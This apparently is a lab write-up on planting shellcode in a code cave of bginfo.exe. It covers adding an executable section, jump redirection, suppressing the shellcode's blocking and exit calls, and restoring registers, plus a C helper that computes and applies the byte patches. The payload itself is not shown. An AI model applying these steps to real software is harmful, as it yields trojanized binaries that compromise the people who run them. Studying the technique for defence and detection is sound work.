Overview of the process:

1. Using CFF Explorer, add a new section `.code1` that will contain our shellcode. Note the size is 200h bytes, so plenty for our shellcode, which was only 324 bytes.
2. Mark the new section as executable (`contains code`), again using CFF Explorer.
3. `pushad` and `pushfd` are the first instructions at 4d8000. It is not shown in this lab how those two instructions were inserted there, but there is no magic: just write the bytes `60 9c` before the shellcode at 0xCD200 in bginfo.exe and you're set. We do this so that we can restore the registers and flags to their saved state before redirecting execution back to bginfo.exe and avoid any crashes.
4. Note the value of ESP right after `pushad` and `pushfd`.
5. Patch the shellcode's `WaitForSingleObject` call so that it does not wait indefinitely and does not freeze bginfo.exe once the shellcode has executed.
6. NOP out the shellcode's final `call ebp` to prevent it from shutting down bginfo.exe.
7. Note the value of ESP after the shellcode has executed.
8. Restore the stack and the state saved in step 3 with `add esp, <ESP_PRE_SHELLCODE - ESP_POST_SHELLCODE>` (this is where the ESP values from steps 4 and 7 come into play; the stack grows downwards, so the value after the shellcode is the smaller one and the difference has to be added back), followed by `popfd` and `popad`, in the reverse order of the pushes.
9. Re-execute the original instruction that our jump overwrote, `mov edi, bb40e64e`.
10. Jump back into bginfo.exe with a `jmp` to the instruction that follows the overwritten one.

Redirecting the execution flow. The instruction at 00467b29 is `mov edi, 0xbb40e64e`. This is the instruction we are going to overwrite, hence we need to remember it for later (step 9 above). We replace it with `jmp 0x004d8000`, which will make bginfo jump to our shellcode located at 0x004d8000 when executed. I found the bytes `bf 4e e6 40 bb` (the bytes found at 00467b29 when bginfo is in memory) in bginfo.exe (screenshot below) and replaced them with the bytes `e9 d2 04 07 00`, which translates to `jmp bginfo.4d8000` (a jump to our shellcode, above screenshot). The relative offset of an `e9` jump is measured from the end of the 5-byte instruction: 0x004d8000 - (0x00467b29 + 5) = 0x000704d2, hence `d2 04 07 00` in little-endian order. Both the original `mov edi, imm32` and the `jmp rel32` are exactly 5 bytes long, so no fragment of the original instruction is left behind. When patching the file on disk, make sure the byte sequence occurs only once in the file, otherwise you risk patching the wrong location.

Dealing with `WaitForSingleObject`. The shellcode calls the `WaitForSingleObject` function (see its definition below). It is called with the argument `INFINITE` (-1 or 0xFFFFFFFF), meaning the calling thread will be blocked forever, and with it bginfo.exe. The call to `WaitForSingleObject` is reached through the `jmp eax` at 004d8081. Note the stack at this point: it contains the handle (28c) of the object to wait on and the wait time FFFFFFFF == INFINITE, which is the second argument of `WaitForSingleObject`. The `dec esi` at 004d811b changes ESI from 0 to -1, and that is the value pushed onto the stack as the `dwMilliseconds` argument for `WaitForSingleObject`. NOP-ing the `dec esi` out leaves ESI = 0, so `WaitForSingleObject` waits 0 milliseconds and returns immediately instead of blocking the UI.

Preventing the shellcode from closing bginfo.exe. NOP out the `call ebp` instruction at 004d8144 if we don't want the shellcode to close the bginfo.exe process.

Restoring the saved state. Now we restore what `pushad` and `pushfd` saved, as described in step 3. ESP after `pushad` and `pushfd` was 0019ff30; ESP after executing the shellcode was 0019fd2c. The shellcode therefore left 0019ff30 - 0019fd2c = 0x204 bytes on the stack, which we remove with `add esp, 0x204` so that `popfd` and `popad` read back the values that were pushed, rather than whatever the shellcode left at the top of the stack. After `popfd` and `popad` the original `mov edi, 0xbb40e64e` is executed and we jump back into bginfo.exe.
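The patch arithmetic above is easy to get wrong by hand, so here is an added, self-contained C example (my code, not part of the original lab or of bginfo) that reproduces it: it encodes the `e9` jump from 00467b29 to 4d8000, computes the `add esp` delta from the two ESP values, maps a cave VA to its raw file offset, patches the original 5 bytes only when they occur exactly once, and assembles the restore epilogue (`add esp, imm32; popfd; popad; mov edi, 0xbb40e64e; jmp back`) in the same way for any cave and patch site, which goes beyond the single case in the text. Assumptions not stated on the page: 0xCD200 is taken as the raw file offset of the start of `.code1` (where `60 9c` are written); the epilogue is placed at 0x4d8146, i.e. right after the 2-byte `pushad`/`pushfd` and the 324-byte shellcode; the return target is derived as the patch site plus 5; the byte buffers in `main` are constructed stand-ins, not real file contents.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Values taken from the write-up. */
#define PATCH_SITE_VA  0x00467b29u   /* mov edi, 0xbb40e64e lives here */
#define CAVE_VA        0x004d8000u   /* start of .code1: pushad / pushfd */
#define CAVE_RAW       0x000cd200u   /* assumed raw file offset of CAVE_VA */
#define ESP_PRE        0x0019ff30u   /* ESP right after pushad/pushfd */
#define ESP_POST       0x0019fd2cu   /* ESP right after the shellcode */

static const uint8_t ORIG_MOV_EDI[5] = { 0xbf, 0x4e, 0xe6, 0x40, 0xbb };

/* rel32 of a 5-byte E9 jmp: target minus the address of the next instruction. */
int32_t jmp_rel32(uint32_t jmp_va, uint32_t target_va)
{
    return (int32_t)(target_va - (jmp_va + 5));
}

/* Encode "jmp target_va" located at jmp_va into out[5]. */
void encode_jmp(uint32_t jmp_va, uint32_t target_va, uint8_t out[5])
{
    uint32_t rel = (uint32_t)jmp_rel32(jmp_va, target_va);
    out[0] = 0xe9;
    for (int i = 0; i < 4; i++)
        out[1 + i] = (uint8_t)(rel >> (8 * i));   /* little-endian */
}

/* Bytes to give back to ESP: the stack grows down, so pre minus post. */
uint32_t esp_delta(uint32_t esp_pre, uint32_t esp_post)
{
    return esp_pre - esp_post;
}

/* Map a VA inside the cave to its raw file offset (assumed CAVE_RAW base). */
uint32_t cave_va_to_raw(uint32_t va)
{
    return va - CAVE_VA + CAVE_RAW;
}

/* Replace needle with repl (both n bytes) only if needle occurs exactly once.
 * Returns the patched offset, -1 if the pattern is absent, -2 if ambiguous. */
long patch_unique(uint8_t *buf, size_t len, const uint8_t *needle,
                  const uint8_t *repl, size_t n)
{
    long found = -1;
    for (size_t i = 0; i + n <= len; i++) {
        if (memcmp(buf + i, needle, n) == 0) {
            if (found >= 0) return -2;          /* second hit: refuse to guess */
            found = (long)i;
        }
    }
    if (found < 0) return -1;
    memcpy(buf + found, repl, n);
    return found;
}

/* Epilogue placed at epilogue_va, right after the shellcode:
 *   add esp, delta ; popfd ; popad ; <original 5 bytes> ; jmp return_va
 * Returns the number of bytes written (18). */
size_t build_epilogue(uint32_t epilogue_va, uint32_t delta,
                      const uint8_t orig[5], uint32_t return_va, uint8_t *out)
{
    size_t n = 0;
    out[n++] = 0x81; out[n++] = 0xc4;               /* add esp, imm32 */
    for (int i = 0; i < 4; i++)
        out[n++] = (uint8_t)(delta >> (8 * i));
    out[n++] = 0x9d;                                /* popfd */
    out[n++] = 0x61;                                /* popad */
    memcpy(out + n, orig, 5); n += 5;               /* mov edi, 0xbb40e64e */
    encode_jmp(epilogue_va + n, return_va, out + n); /* jmp back, relative to its own VA */
    n += 5;
    return n;
}

int main(void)
{
    /* Constructed stand-in for a slice of bginfo.exe around the patch site. */
    uint8_t image[32] = { 0x90, 0x90, 0x90, 0xbf, 0x4e, 0xe6, 0x40, 0xbb, 0x90 };
    uint8_t jmp[5];
    encode_jmp(PATCH_SITE_VA, CAVE_VA, jmp);        /* e9 d2 04 07 00 */
    long off = patch_unique(image, sizeof image, ORIG_MOV_EDI, jmp, 5);
    if (off >= 0) {
        printf("patched at offset %ld:", off);
        for (int i = 0; i < 5; i++) printf(" %02x", image[off + i]);
        printf("\n");
    }

    uint8_t epi[32];
    /* Assumed layout: 2-byte pushad/pushfd + 324-byte shellcode -> 0x4d8146;
     * return to the instruction after the overwritten 5-byte mov. */
    size_t n = build_epilogue(0x004d8146u, esp_delta(ESP_PRE, ESP_POST),
                              ORIG_MOV_EDI, PATCH_SITE_VA + 5, epi);
    printf("epilogue (%zu bytes):", n);
    for (size_t i = 0; i < n; i++) printf(" %02x", epi[i]);
    printf("\n");
    printf("dec esi at 0x4d811b -> raw 0x%x, call ebp at 0x4d8144 -> raw 0x%x\n",
           cave_va_to_raw(0x004d811bu), cave_va_to_raw(0x004d8144u));
    return 0;
}
```

`patch_unique` is the on-disk equivalent of the "search for `bf 4e e6 40 bb` and overwrite it" step, with the check a practitioner wants: it refuses to patch if the pattern appears more than once, since a 5-byte sequence is not guaranteed to be unique in a large binary. `cave_va_to_raw` gives the file offsets at which `dec esi` and `call ebp` are NOP-ed (`90` and `90 90` respectively) when the cave is edited in a hex editor rather than in the debugger.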